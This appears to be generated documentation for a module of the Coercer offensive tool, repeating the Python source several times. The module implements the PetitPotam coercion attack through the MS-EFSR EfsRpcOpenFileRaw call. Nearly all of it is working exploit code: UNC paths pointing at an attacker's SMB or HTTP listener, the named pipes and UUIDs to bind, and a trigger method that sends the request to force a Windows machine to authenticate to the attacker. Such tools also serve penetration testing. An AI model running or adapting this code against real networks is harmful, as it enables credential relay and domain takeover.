coercer.methods.MS_EFSR.EfsRpcOpenFileRaw

  1#!/usr/bin/env python3
  2# -*- coding: utf-8 -*-
  3# File name          : EfsRpcOpenFileRaw.py
  4# Author             : Podalirius (@podalirius_)
  5# Date created       : 16 Sep 2022
  6
  7
  8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
  9from coercer.network.DCERPCSessionError import DCERPCSessionError
 10from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
 11from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
 12
 13
 14class _EfsRpcOpenFileRaw(NDRCALL):
 15    """
 16    Structure to make the RPC call to EfsRpcOpenFileRaw() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 17    """
 18    opnum = 0
 19    structure = (
 20        ('FileName', WSTR),  # Type: wchar_t *
 21        ('Flags', LONG),     # Type: long
 22    )
 23
 24
 25class _EfsRpcOpenFileRawResponse(NDRCALL):
 26    """
 27    Structure to parse the response of the RPC call to EfsRpcOpenFileRaw() in [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 28    """
 29    structure = ()
 30
 31
 32class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
 33    """
 34    Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 35
 36    Method found by:
 37     - [@topotam77](https://twitter.com/topotam77)
 38    """
 39
 40    exploit_paths = [
 41        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 42        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 44        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 45    ]
 46
 47    access = {
 48        "ncan_np": [
 49            {
 50                "namedpipe": r"\PIPE\efsrpc",
 51                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 52                "version": "1.0"
 53            },
 54            {
 55                "namedpipe": r"\PIPE\lsarpc",
 56                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 57                "version": "1.0"
 58            },
 59            {
 60                "namedpipe": r"\PIPE\samr",
 61                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 62                "version": "1.0"
 63            },
 64            {
 65                "namedpipe": r"\PIPE\lsass",
 66                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 67                "version": "1.0"
 68            },
 69            {
 70                "namedpipe": r"\PIPE\netlogon",
 71                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 72                "version": "1.0"
 73            },
 74        ],
 75        "ncacn_ip_tcp": [
 76            {
 77                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 78                "version": "1.0"
 79            },
 80            {
 81                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 82                "version": "1.0"
 83            }
 84        ]
 85    }
 86
 87    protocol = {
 88        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
 89        "shortname": "MS-EFSR"
 90    }
 91
 92    function = {
 93        "name": "EfsRpcOpenFileRaw",
 94        "opnum": 0,
 95        "vulnerable_arguments": ["FileName"]
 96    }
 97
 98    def trigger(self, dcerpc_session, target):
 99        if dcerpc_session is not None:
100            try:
101                request = _EfsRpcOpenFileRaw()
102                request['FileName'] = self.path
103                request['Flags'] = 0
104                resp = dcerpc_session.request(request)
105                return ""
106            except Exception as err:
107                return err
108        else:
109            print("[!] Error: dce is None, you must call connect() first.")
110            return None
class EfsRpcOpenFileRaw(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
 33class EfsRpcOpenFileRaw(MSPROTOCOLRPCCALL):
 34    """
 35    Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of [MS-EFSR Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31)
 36
 37    Method found by:
 38     - [@topotam77](https://twitter.com/topotam77)
 39    """
 40
 41    exploit_paths = [
 42        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'),
 43        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'),
 44        ("smb", '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'),
 45        ("http", '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00'),
 46    ]
 47
 48    access = {
 49        "ncan_np": [
 50            {
 51                "namedpipe": r"\PIPE\efsrpc",
 52                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 53                "version": "1.0"
 54            },
 55            {
 56                "namedpipe": r"\PIPE\lsarpc",
 57                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 58                "version": "1.0"
 59            },
 60            {
 61                "namedpipe": r"\PIPE\samr",
 62                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 63                "version": "1.0"
 64            },
 65            {
 66                "namedpipe": r"\PIPE\lsass",
 67                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 68                "version": "1.0"
 69            },
 70            {
 71                "namedpipe": r"\PIPE\netlogon",
 72                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 73                "version": "1.0"
 74            },
 75        ],
 76        "ncacn_ip_tcp": [
 77            {
 78                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
 79                "version": "1.0"
 80            },
 81            {
 82                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
 83                "version": "1.0"
 84            }
 85        ]
 86    }
 87
 88    protocol = {
 89        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
 90        "shortname": "MS-EFSR"
 91    }
 92
 93    function = {
 94        "name": "EfsRpcOpenFileRaw",
 95        "opnum": 0,
 96        "vulnerable_arguments": ["FileName"]
 97    }
 98
 99    def trigger(self, dcerpc_session, target):
100        if dcerpc_session is not None:
101            try:
102                request = _EfsRpcOpenFileRaw()
103                request['FileName'] = self.path
104                request['Flags'] = 0
105                resp = dcerpc_session.request(request)
106                return ""
107            except Exception as err:
108                return err
109        else:
110            print("[!] Error: dce is None, you must call connect() first.")
111            return None

Coercing a machine to authenticate using function EfsRpcOpenFileRaw (opnum 0) of MS-EFSR Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\file.txt\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\\x00'), ('smb', '\\\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\x00'), ('http', '\\\\{{listener}}{{http_listen_port}}/{{rnd(3)}}\\file.txt\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol = {'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
function = {'name': 'EfsRpcOpenFileRaw', 'opnum': 0, 'vulnerable_arguments': ['FileName']}
def trigger(self, dcerpc_session, target):
 99    def trigger(self, dcerpc_session, target):
100        if dcerpc_session is not None:
101            try:
102                request = _EfsRpcOpenFileRaw()
103                request['FileName'] = self.path
104                request['Flags'] = 0
105                resp = dcerpc_session.request(request)
106                return ""
107            except Exception as err:
108                return err
109        else:
110            print("[!] Error: dce is None, you must call connect() first.")
111            return None